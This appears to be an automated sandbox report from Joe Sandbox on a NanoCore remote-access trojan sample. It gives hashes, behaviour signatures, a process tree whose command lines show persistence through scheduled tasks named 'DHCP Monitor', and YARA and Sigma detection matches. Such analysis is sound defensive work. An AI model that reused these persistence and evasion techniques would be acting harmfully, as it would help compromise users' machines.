Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ameHrrFwNp.exe

Overview

General Information

Sample Name:ameHrrFwNp.exe
Analysis ID:501919
MD5:1f221e6e2a07d553e3fcf5bdb5874b2e
SHA1:0cd7541409f63dda3781d18c61bdcd74782192e6
SHA256:2d2f62269797be7ef763ac2da37e4c190381cfba8798e92e73ee9aa2084386f1
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Creates multiple autostart registry keys
Connects to many ports of the same IP (likely port scanning)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • ameHrrFwNp.exe (PID: 5216 cmdline: 'C:\Users\user\Desktop\ameHrrFwNp.exe' MD5: 1F221E6E2A07D553E3FCF5BDB5874B2E)
    • bspmflqee.pif (PID: 3836 cmdline: 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ije MD5: 8E699954F6B5D64683412CC560938507)
      • RegSvcs.exe (PID: 4644 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 6764 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2352 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp94A3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegSvcs.exe (PID: 2148 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • bspmflqee.pif (PID: 1048 cmdline: 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije MD5: 8E699954F6B5D64683412CC560938507)
    • RegSvcs.exe (PID: 3560 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 5076 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 7032 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • dhcpmon.exe (PID: 1504 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • bspmflqee.pif (PID: 3032 cmdline: 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije MD5: 8E699954F6B5D64683412CC560938507)
    • RegSvcs.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 6664 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • bspmflqee.pif (PID: 4732 cmdline: 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije MD5: 8E699954F6B5D64683412CC560938507)
    • RegSvcs.exe (PID: 6540 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5104 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf1e5:$x1: NanoCore.ClientPluginHost
  • 0xf222:$x2: IClientNetworkHost
  • 0x12d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xef4d:$a: NanoCore
    • 0xef5d:$a: NanoCore
    • 0xf191:$a: NanoCore
    • 0xf1a5:$a: NanoCore
    • 0xf1e5:$a: NanoCore
    • 0xefac:$b: ClientPlugin
    • 0xf1ae:$b: ClientPlugin
    • 0xf1ee:$b: ClientPlugin
    • 0xf0d3:$c: ProjectData
    • 0xfada:$d: DESCrypto
    • 0x174a6:$e: KeepAlive
    • 0x15494:$g: LogClientMessage
    • 0x1168f:$i: get_Connected
    • 0xfe10:$j: #=q
    • 0xfe40:$j: #=q
    • 0xfe5c:$j: #=q
    • 0xfe8c:$j: #=q
    • 0xfea8:$j: #=q
    • 0xfec4:$j: #=q
    • 0xfef4:$j: #=q
    • 0xff10:$j: #=q
    0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf9ed:$x1: NanoCore.ClientPluginHost
    • 0xfa2a:$x2: IClientNetworkHost
    • 0x1355d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 231 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      32.2.RegSvcs.exe.3a2e6b0.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1646:$x1: NanoCore.ClientPluginHost
      32.2.RegSvcs.exe.3a2e6b0.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x1646:$x2: NanoCore.ClientPluginHost
      • 0x1724:$s4: PipeCreated
      • 0x1660:$s5: IClientLoggingHost
      5.2.RegSvcs.exe.48bb041.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xf7ad:$x1: NanoCore.ClientPluginHost
      • 0x2874c:$x1: NanoCore.ClientPluginHost
      • 0xf7da:$x2: IClientNetworkHost
      • 0x28779:$x2: IClientNetworkHost
      5.2.RegSvcs.exe.48bb041.6.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xf7ad:$x2: NanoCore.ClientPluginHost
      • 0x2874c:$x2: NanoCore.ClientPluginHost
      • 0x10888:$s4: PipeCreated
      • 0x29827:$s4: PipeCreated
      • 0xf7c7:$s5: IClientLoggingHost
      • 0x28766:$s5: IClientLoggingHost
      5.2.RegSvcs.exe.48bb041.6.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 292 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        System Summary:

        barindex
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ije, ParentImage: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif, ParentProcessId: 3836, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644
        Sigma detected: Possible Applocker BypassShow sources
        Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ije, ParentImage: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif, ParentProcessId: 3836, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 4644, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifReversingLabs: Detection: 32%
        Source: 32.2.RegSvcs.exe.1300000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 5.2.RegSvcs.exe.11a0000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 19.2.RegSvcs.exe.500000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 5.2.RegSvcs.exe.6fb0000.11.unpackAvira: Label: TR/NanoCore.fadte
        Source: 24.2.RegSvcs.exe.1300000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: ameHrrFwNp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: ameHrrFwNp.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
